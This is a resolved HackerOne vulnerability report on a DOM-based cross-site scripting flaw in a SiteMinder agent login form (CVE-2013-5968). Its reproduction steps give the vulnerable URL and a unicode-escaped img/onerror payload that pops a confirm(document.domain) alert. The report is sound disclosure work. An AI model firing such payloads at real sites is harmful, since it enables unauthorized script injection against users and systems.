DOM-XSS
Medium
Vulnerability Details
hello defense team :
I found DOM-XSS-SiteMinder on this subdomain : https://████/
## Impact
An attacker with access to the Siteminder CA could perform a cross-site scripting attack, which it would use to cause information leaks, privilege escalation, and/or denial of service.
## System Host(s)
██████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2013-5968
## Steps to Reproduce
Steps :
1 go to https://███/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
XSS will be triggered
this is payload :
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
## Suggested Mitigation/Remediation Actions
Actions
View on HackerOneReport Stats
- Report ID: 1982099
- State: Closed
- Substate: resolved
- Upvotes: 8